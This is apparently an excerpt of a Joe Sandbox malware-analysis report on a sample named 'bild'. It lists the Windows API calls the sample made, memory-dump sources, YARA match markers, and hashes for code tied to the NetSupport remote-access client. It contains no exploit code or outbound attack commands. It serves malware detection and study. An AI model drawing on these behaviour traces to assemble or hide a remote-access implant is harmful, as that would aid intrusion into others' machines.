                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _calloc
                                                                                  • String ID:
                                                                                  • API String ID: 1679841372-0
                                                                                  • Opcode ID: 9cedd041eecb3df7698fbc33d80b44fc007d69f78d2f5524ab9bd2bf2492814b
                                                                                  • Instruction ID: 0024421513bb2e1abb717dbf2ce3cdefbb73aa1ee3cdb3a5feae03928f974db8
                                                                                  • Opcode Fuzzy Hash: 9cedd041eecb3df7698fbc33d80b44fc007d69f78d2f5524ab9bd2bf2492814b
                                                                                  • Instruction Fuzzy Hash: 8C519E7560020AAFDB50CF68CC81FAAB7A6FF8A704F148459F929DB280D771E901CF95
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6D031E32,00000001,?,00000000,00000000,00000000,?,6D0575BC,00000001,00000214), ref: 6D0309E8
                                                                                  • _errno.MSVCR100(?,6D031E32,00000001,?,00000000,00000000,00000000,?,6D0575BC,00000001,00000214), ref: 6D05F3D7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3890464582.000000006D021000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6D020000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3890446633.000000006D020000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890532245.000000006D0D4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890550927.000000006D0D6000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890580013.000000006D0D9000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6d020000_bild.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap_errno
                                                                                  • String ID:
                                                                                  • API String ID: 242259997-0
                                                                                  • Opcode ID: 67fb72a28df43ed315900cbb115b4621e6a4ea095cb8aecca2215fe23e9e1abb
                                                                                  • Instruction ID: 8af9592790cf8e6aac158a95602f6d4a7257305f0db91d4f594019520827250e
                                                                                  • Opcode Fuzzy Hash: 67fb72a28df43ed315900cbb115b4621e6a4ea095cb8aecca2215fe23e9e1abb
                                                                                  • Instruction Fuzzy Hash: 4F01B53125A2279BFB059F2AD844B7B3BDCAF42751F02862AAD25CB1D0DBB4D450C750
                                                                                  APIs
                                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
                                                                                  • __wsplitpath.LIBCMT ref: 11111475
                                                                                    • Part of subcall function 11169044: __splitpath_helper.LIBCMT ref: 11169086
                                                                                  • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
                                                                                  • String ID:
                                                                                  • API String ID: 1847508633-0
                                                                                  • Opcode ID: 7498e584b69856d4904a5e87c0faea6464729445070a8fc0c411536d822b12a4
                                                                                  • Instruction ID: 71a9510f599fa1c136cb45ff21797ad5c5790827a759e4d2b52c0b71367846c8
                                                                                  • Opcode Fuzzy Hash: 7498e584b69856d4904a5e87c0faea6464729445070a8fc0c411536d822b12a4
                                                                                  • Instruction Fuzzy Hash: 34116175A4021DABEB14DF94CD42FE9F378AB48B04F404199E7246B1C0E7B12A48CB65
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA01
                                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA08
                                                                                    • Part of subcall function 1109E910: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,1102FCB2,?,00000000), ref: 1109E948
                                                                                    • Part of subcall function 1109E910: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109E964
                                                                                    • Part of subcall function 1109E910: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00ECE240,00ECE240,00ECE240,00ECE240,00ECE240,00ECE240,00ECE240,@,?,00000001,00000001), ref: 1109E990
                                                                                    • Part of subcall function 1109E910: EqualSid.ADVAPI32(?,00ECE240,?,00000001,00000001), ref: 1109E9A3
                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1109EA27
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                                  • String ID:
                                                                                  • API String ID: 2256153495-0
                                                                                  • Opcode ID: 3278d9adbe4d3509b3b3548b9dad78e2718189f4cc0d765404142b0664a012dd
                                                                                  • Instruction ID: 36b54363b319bb335bc5da0d0e9bdd0405b18079b131e91390d3ecc07929186c
                                                                                  • Opcode Fuzzy Hash: 3278d9adbe4d3509b3b3548b9dad78e2718189f4cc0d765404142b0664a012dd
                                                                                  • Instruction Fuzzy Hash: DCF05E78A15328EFD709CFF5D88482EB7A9AF08208700447DF629D3205E631EE009F50
                                                                                  APIs
                                                                                  • InitializeCriticalSection.KERNEL32(111F0908,AD96CFBE,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F754
                                                                                  • EnterCriticalSection.KERNEL32(111F0908,AD96CFBE,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F770
                                                                                  • LeaveCriticalSection.KERNEL32(111F0908,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F7B8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterInitializeLeave
                                                                                  • String ID:
                                                                                  • API String ID: 3991485460-0
                                                                                  • Opcode ID: de9cc3b242b9749762f72f1a9abe3d064888d8cc99300df6bb387b99347c91a8
                                                                                  • Instruction ID: 724175da6b3b5eb63f60f43096b8b9410b0df93e13cce3f4766159a849acac97
                                                                                  • Opcode Fuzzy Hash: de9cc3b242b9749762f72f1a9abe3d064888d8cc99300df6bb387b99347c91a8
                                                                                  • Instruction Fuzzy Hash: 3D11C675A0061AAFE700CF65CD85B5BF7A9FB88714F010129E829E3340F7359808CB92
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11068A12
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: ??CTL32.DLL
                                                                                  • API String ID: 1029625771-2984404022
                                                                                  • Opcode ID: f114da26ba1a202df3ee97640f196ffb6169a957819133968d89773a25347f90
                                                                                  • Instruction ID: 38d720fc7c26638894156a2f8924bac31edb6b50614c34829f37a9a02c5b1e22
                                                                                  • Opcode Fuzzy Hash: f114da26ba1a202df3ee97640f196ffb6169a957819133968d89773a25347f90
                                                                                  • Instruction Fuzzy Hash: 5831F5B2A04781DFE711CF59DC40B5AF7E8FB45724F0482AAE92897380E735A900CB92
                                                                                  APIs
                                                                                  • GetDriveTypeA.KERNEL32(?), ref: 11026B6D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DriveType
                                                                                  • String ID: ?:\
                                                                                  • API String ID: 338552980-2533537817
                                                                                  • Opcode ID: b7a90a31e7e06615914d848c67eda86d39421f745c303f5cb5263aa0826e519a
                                                                                  • Instruction ID: c0198090b602517e4922a9d0df48f1c050a77905515f879100581957a4b6d58d
                                                                                  • Opcode Fuzzy Hash: b7a90a31e7e06615914d848c67eda86d39421f745c303f5cb5263aa0826e519a
                                                                                  • Instruction Fuzzy Hash: 64F09065C083DA2AEB23DE608844596BFE84B463A8F5488D9DCE887541D165E1C58791
                                                                                  APIs
                                                                                    • Part of subcall function 110ED160: RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D
                                                                                  • RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED1BC
                                                                                    • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                  Strings
                                                                                  • Error %d Opening regkey %s, xrefs: 110ED1CA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseOpenwvsprintf
                                                                                  • String ID: Error %d Opening regkey %s
                                                                                  • API String ID: 1772833024-3994271378
                                                                                  • Opcode ID: 503dc904c3fe8a3076b33c474287afaa84f0668cd560d7128fb7a99791884548
                                                                                  • Instruction ID: 33cf1931661e2960d377c619dd89904b97ea319b13ae6f8f8dcb9591a9c6775e
                                                                                  • Opcode Fuzzy Hash: 503dc904c3fe8a3076b33c474287afaa84f0668cd560d7128fb7a99791884548
                                                                                  • Instruction Fuzzy Hash: 60E0927A6012187FD210961B9C89F9BBB2DDB856A4F000069FD1487201C972EC1082B0
                                                                                  APIs
                                                                                  • RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D
                                                                                    • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                  Strings
                                                                                  • Error %d closing regkey %x, xrefs: 110ED17D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Closewvsprintf
                                                                                  • String ID: Error %d closing regkey %x
                                                                                  • API String ID: 843752472-892920262
                                                                                  • Opcode ID: c03f117d653720bd7e371fb7cf4e9287afa325923508867b0082396cad6e8e67
                                                                                  • Instruction ID: 72b2cf3cdd4b8fd577e25b07e2838f9a8e734d144b1f96517ba84771a8eadcbb
                                                                                  • Opcode Fuzzy Hash: c03f117d653720bd7e371fb7cf4e9287afa325923508867b0082396cad6e8e67
                                                                                  • Instruction Fuzzy Hash: 4EE08679A022126BD3289A1EAC18F5BB6E8DFC4300F1604ADF850C3240DA70D8018664
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(NSMTRACE,?,1102DE54,11026580,02B6B888,?,?,?,00000100,?,?,00000009), ref: 111463E9
                                                                                    • Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: HandleLibraryLoadModule
                                                                                  • String ID: NSMTRACE
                                                                                  • API String ID: 4133054770-4175627554
                                                                                  • Opcode ID: e82bf018f903e4ea25f627aae3f92f4affe26e4f9d0fd19bd58a96316eee6a50
                                                                                  • Instruction ID: cf49eb18fee32400038a48a9d82a087192b912de878353ac6c822cd252c7dc11
                                                                                  • Opcode Fuzzy Hash: e82bf018f903e4ea25f627aae3f92f4affe26e4f9d0fd19bd58a96316eee6a50
                                                                                  • Instruction Fuzzy Hash: 50D05EB520033BCFDB489F7995B4269F7EAAB4CA1D3540075E469C2A07EBB0D848C714
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(psapi.dll,?,110302C4), ref: 11025CD8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: psapi.dll
                                                                                  • API String ID: 1029625771-80456845
                                                                                  • Opcode ID: 84de3e9765d3447a8351f1b6b6d8569fbb25dc0ee6f9e080ef7528236ef5d75a
                                                                                  • Instruction ID: d2f0b82a95d6fc878682dccaf19b7a180456f678ee46f3fe844c8dbdc6f5fb44
                                                                                  • Opcode Fuzzy Hash: 84de3e9765d3447a8351f1b6b6d8569fbb25dc0ee6f9e080ef7528236ef5d75a
                                                                                  • Instruction Fuzzy Hash: C9E001B1A11B248FC3B4CF3AA844642FAF0BB18A103118A3ED4AEC3A00E330A5448F80
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102EF80,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 11014F8E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: nslsp.dll
                                                                                  • API String ID: 1029625771-3933918195
